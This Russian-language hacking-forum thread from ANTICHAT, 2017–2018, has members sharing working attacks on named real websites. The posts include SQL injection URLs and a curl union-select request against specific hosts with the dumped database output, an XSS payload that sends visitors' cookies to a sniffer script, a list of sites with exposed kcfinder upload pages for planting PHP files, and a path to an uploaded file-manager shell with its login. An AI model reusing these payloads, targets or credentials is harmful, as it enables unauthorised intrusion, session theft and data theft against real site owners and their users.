HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.10.2017, 18:57
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от Octavian  

Зачем
MD5( 123456 ) = e10adc3949ba59abbe56e057f20f883e

Я думал, этот хэш все знают наизусть. Смысл его замазывать?)
 
Ответить с цитированием

  #2  
Старый 07.10.2017, 19:23
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

Цитата:
Сообщение от BigBear  

MD5( 123456 ) = e10adc3949ba59abbe56e057f20f883e

Я думал, этот хэш все знают наизусть. Смысл его замазывать?)

бабадука спроси

PS:Сиски тоже видели все но на ютубе их замазывают
 
Ответить с цитированием

  #3  
Старый 08.10.2017, 09:56
f0b0s
Новичок
Регистрация: 26.05.2011
Сообщений: 6
С нами: 7876406

Репутация: 1
По умолчанию

Сайт:http://www.vacbanned.com

Уязвимость: SQL Injection

Эксплойт:

Код:
http://www.vacbanned.com:80/view/detail/id/76561197960265741) AND 3612=3612 AND (8789=8789
MySQL > 5.0.11

available databases [3]:
[*] information_schema
[*] vacbanned_dev
[*] vacbanned_v2
 
Ответить с цитированием

  #4  
Старый 01.11.2017, 01:04
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

Засунул в инпутах фейка https://wf-code.ru

[CODE]
">img = new Image(); img.src = "/snif.php?c="+document.cookie+window.location.href;
 
Ответить с цитированием

  #5  
Старый 06.12.2017, 14:21
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

SSRF Подъехала

Код:
https://us.hidester.co
.SpoilerTarget" type="button">Spoiler

Кто сможет перейти на другой протокол пишите метод
 
Ответить с цитированием

  #6  
Старый 01.02.2018, 23:48
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

Arbitrary file upload 1.php.asd

Код:
http://ecaterix.md/ecaterix.md/kcfinder/browse.php
http://www.basukiwater.com/assets/js/mylibs/kcfinder/browse.php
http://www.oonohousing.com/member/user/kcfinder/browse.php
http://www.golfoldcourse.com/kcfinder/browse.php
http://www.careersinmorocco.com/www3/assets/js/ckeditor/kcfinder/browse.php
http://dinamikadwiputraperkasajaya.com/admin/assets/kcfinder/browse.php
http://grossiste-tissus.fr/ckeditor/kcfinder/browse.php
http://ex-theatreasia.com/kcfinder/browse.php
http://tohmei-group.sakura.ne.jp/user_data/packages/admin/js/kcfinder/browse.php
http://www.urfaposet.com/panel/kcfinder/browse.php
http://www.raksthai.org/asset/kcfinder/
http://www.godimex.pl/sklep/design/_js_libs/ckeditor/kcfinder/browse.php
http://hadu.org/kcfinder/browse.php
Гуглом можно насобирать сайтов
 
Ответить с цитированием

  #7  
Старый 02.02.2018, 00:04
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

Цитата:
Сообщение от BabaDook  

Если честно, то к сожалению я ничего не понял, распиши пожалуйста где там уязвимость .
Можем загружать PHP фаилы

L:fm_admin

P:fm_admin

Код:
http://ecaterix.md/ecaterix.md/kcfinder/upload/files/filemanager.php.asd
 
Ответить с цитированием

  #8  
Старый 03.04.2018, 20:50
erwerr2321
Флудер
Регистрация: 19.06.2015
Сообщений: 4,126
С нами: 5738006

Репутация: 147


По умолчанию

там оно всё дырявое куда не ткни...

писать бесполезно - пишут, что всё починили и всё работает.

.SpoilerTarget" type="button">Spoiler: Onesecurity - unsecure

Код:
curl -s -k --proxy socks5://127.0.0.1:9150 http://onesecurity.zyxel.com/php/wizard.php --data "instruction=get_wizards&parameters%5Btype%5D=z%27 union select 1,@@version--+&parameters%5Bdirection%5D=DESC&parameters%5Bget_active%5D=true"
"Microsoft SQL Server 2005 - 9.00.5057.00 (Intel X86) Mar 25 2011 13:50:04 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 6.0 (Build 6002: Service Pack 2)"
 
Ответить с цитированием

  #9  
Старый 08.04.2018, 18:52
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

 
Ответить с цитированием

  #10  
Старый 10.04.2018, 16:10
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами: 5025206

Репутация: 5
По умолчанию

Цитата:
Сообщение от BabaDook  
+ sql inject

Код:
http://www.task.ua/funds/?id=1&language='and updatexml(NULL,concat(0x0a,(SELECT database())),Null)-- -
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...